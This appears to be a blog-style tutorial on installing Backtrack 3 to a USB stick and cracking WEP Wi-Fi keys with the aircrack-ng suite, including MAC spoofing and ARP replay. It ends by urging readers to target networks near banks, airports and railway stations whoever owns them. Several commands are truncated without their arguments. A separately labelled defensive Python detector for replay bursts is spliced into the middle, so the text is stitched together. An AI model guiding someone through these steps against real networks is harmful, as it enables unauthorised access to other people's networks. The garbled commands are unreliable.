Hi,
In this session I am going to talk about the mother of all hacks :)
Actually the Backtrack Linux distribution came into existence because of "AUDITOR" & "WHAX". These two are Linux distributions built for only one purpose: live penetration testing, which means checking whether a computer or network is safe against malicious attack by creating simulated attacks.
Backtrack is simply the combination of those two distributions. So if you are looking for a one-stop OS to learn hacking or to hack remote systems, then Backtrack is for you....
You can live boot from a USB stick, a CD or the hard drive as you wish... but USB is more than enough for cracking WIFI network keys. Yes, today I'm going to talk about this part in detail....
CRACK WEP/WPA key with Backtrack 3:
You can find the Backtrack distros at this link: http://www.remote-exploit.org/backtrack_download.html (the official site for Backtrack). Version 4 beta has been released, but I'm going to download the Backtrack 3 (USB extended version) .ISO file. It may take 4-5 hrs at 54 MBPS speed. After it is downloaded, extract the ISO file with the help of WinRAR; you will find two folders named "BOOT" & "BT3". Now format your USB drive and then copy those two folders alone...
After copying, open a command prompt in Windows, type the USB drive letter (for example f:) and press enter, then type the following..
prompt>cd BOOT
prompt\boot>bootinst.bat then press enter...
Now reboot your computer; while rebooting, go to the BIOS setup and change the boot order from hard drive to USB. Now Backtrack gets loaded from the USB drive....
Make sure you have a built-in WIFI adapter, or you will have to buy an external USB WIFI adapter for your system....
After the Backtrack desktop gets loaded, open a terminal window (just like the command prompt in Windows), then open two more terminal windows... With three terminal shells open, type the following.... From now on I will name those three shell windows shell1, shell2 & shell3...
Open the first terminal shell window, i.e. Shell1, and type the following...
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Check that monitor mode is enabled...
airodump-ng wlan0
The program runs... after that it shows a list of secured or unsecured WIFI networks along with name, BSSID, ESSID, channel number etc... Choose the one you want.... and proceed further...
airodump-ng -c
The program runs in SHELL 1... which actually monitors the status of the program...
Open another shell, i.e. SHELL 2.... and enter the following command
aireplay-ng -1 0 -a
The program runs in the 2nd shell
After getting the "association successful" message... type the following in SHELL 2..
aireplay-ng -3 -b
The program runs to get connected to your target network...
Open the 3rd shell and type...
aircrack-ng wep-01.cap
The brute force combination program runs until it decrypts correctly, so wait...
You will get a cracked key in a minute... Happy hacking...:)
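As an added example that is not part of the original post, the following Python script shows the defender's side of the replay step above: a wireless IDS can recognise an injector because it resends one captured ARP frame hundreds of times per second, so a single source MAC emits bursts of identical-length data frames. The frame records, MAC addresses, frame size, window and threshold are constructed assumptions for this example, not values from the post.

```python
"""Flag stations whose data-frame pattern looks like a WEP ARP-replay injection.

Input is a list of (timestamp_seconds, source_mac, frame_length_bytes) records,
the kind a wireless IDS or a packet-capture decoder would produce. The heuristic
(many identical-length frames from one station inside a short window) and the
threshold values below are assumptions chosen for this example.
"""
from collections import defaultdict


def find_replay_bursts(frames, window=1.0, threshold=200):
    """Return {mac: (frame_len, peak_count)} for stations that send at least
    `threshold` frames of one length within any `window`-second span."""
    by_key = defaultdict(list)
    for ts, mac, length in frames:
        by_key[(mac, length)].append(ts)

    alerts = {}
    for (mac, length), times in by_key.items():
        times.sort()
        left = 0
        peak = 0
        # Sliding window: advance `left` until times[left..right] fits in `window`.
        for right, t in enumerate(times):
            while t - times[left] > window:
                left += 1
            peak = max(peak, right - left + 1)
        if peak >= threshold and peak > alerts.get(mac, (0, 0))[1]:
            alerts[mac] = (length, peak)
    return alerts


def build_sample_frames():
    """Constructed sample traffic: one ordinary client and one replay injector."""
    frames = []
    # Ordinary client: 20 frames/s for 5 s, frame length varies from frame to frame.
    for i in range(100):
        frames.append((i * 0.05, "aa:bb:cc:00:00:01", 100 + (i * 37) % 900))
    # Injector: the same short ARP request (68 bytes here) replayed 500 times/s for 2 s.
    for i in range(1000):
        frames.append((1.0 + i * 0.002, "aa:bb:cc:00:00:02", 68))
    return frames


if __name__ == "__main__":
    for mac, (length, peak) in find_replay_bursts(build_sample_frames()).items():
        print(f"ALERT {mac}: {peak} frames of {length} bytes within 1 s")
```

Raising the threshold or widening the window trades sensitivity for fewer false positives from chatty but legitimate clients such as VoIP handsets.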
NOTE: Make sure you are in a safe place... and stay near WIFI hotspots such as banks, MNCs, railway stations or airports.....etc... It doesn't matter whether your target network is secured or unsecured....
Remember, every system has a "FLAW".........